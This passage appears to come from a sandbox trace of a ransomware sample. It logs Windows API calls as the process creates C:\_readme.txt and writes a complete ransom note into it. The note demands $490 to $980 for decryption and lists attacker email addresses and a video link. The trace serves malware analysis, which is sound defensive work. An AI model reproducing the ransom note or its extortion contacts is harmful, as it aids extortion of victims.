lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.775] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x49ba1a0 [0127.775] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.776] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0127.776] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.776] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.776] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.776] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.776] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.776] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.777] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.777] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.777] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.777] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.777] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0127.777] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.777] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.777] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc2e) returned 0x7516fe8 [0127.777] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.777] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.777] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.777] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.777] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0127.777] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.777] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0127.777] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.777] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0127.777] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.777] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.777] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.777] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.777] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.777] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0127.777] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.777] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0127.777] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.777] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.777] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.777] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.777] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.777] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.777] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.777] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.777] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.777] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.778] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.778] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.778] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.778] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.778] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.778] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.778] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0127.778] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.778] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.778] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.778] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.778] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.778] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc2e) returned 0x7516fe8 [0127.778] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.778] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.778] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0127.778] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.778] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0127.778] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.778] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.778] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.778] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.778] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.778] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.778] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0127.778] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.778] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.778] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0127.778] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.778] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0127.778] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.778] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.778] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.778] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.778] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.778] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.779] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.779] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.779] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.779] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.779] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.779] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.779] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.779] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.779] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.779] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.779] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0127.779] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.779] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.779] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.779] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.779] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0127.779] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.779] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0127.779] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.779] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.779] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.779] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.779] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.779] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.779] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0127.779] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.779] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.780] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0127.780] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.780] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0127.780] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.780] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.780] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.780] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.780] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.780] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.780] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.780] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.780] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.780] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.780] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.780] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.780] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.780] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.780] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.780] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.780] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0127.780] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.780] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.780] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.780] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.780] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0127.780] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.780] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0127.780] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.780] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.780] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.780] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.781] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.781] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.781] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0127.781] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.781] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.781] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0127.781] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.781] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.781] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.781] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.781] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.781] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.781] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.781] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.781] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.781] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.781] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.781] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0127.781] PathFindFileNameW (pszPath="") returned="" [0127.781] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0127.782] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0127.782] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x800) returned 0x7516fe8 [0127.782] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x7516fe8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0127.782] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x810) returned 0xdcd2280 [0127.782] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8328 [0127.782] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.782] FreeLibrary (hLibModule=0x759d0000) returned 1 [0127.782] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8328 | out: hHeap=0x4970000) returned 1 [0127.782] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.782] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x806) returned 0x7516fe8 [0127.782] PathAppendW (in: pszPath="C:\\", pMore="_readme.txt" | out: pszPath="C:\\_readme.txt") returned 1 [0127.782] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x810) returned 0xdcd2280 [0127.783] PathFileExistsW (pszPath="C:\\_readme.txt") returned 0 [0127.783] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x7d00) returned 0xdd2c688 [0127.783] lstrcpyW (in: lpString1=0xdd2c688, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhki" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhki") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhki" [0127.783] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhki", lpString2="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhkisM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhkisM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH" [0127.783] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x810) returned 0xdcd2b08 [0127.783] CreateFileW (lpFileName="C:\\_readme.txt" (normalized: "c:\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c4 [0127.784] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8c0) returned 0x49db7d8 [0127.784] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x85c) returned 0x49dc0a0 [0127.784] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhkisM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH", cchWideChar=-1, lpMultiByteStr=0x49dc0a0, cbMultiByte=2140, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhkisM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH", lpUsedDefaultChar=0x0) returned 1117 [0127.784] RtlAllocateHeap 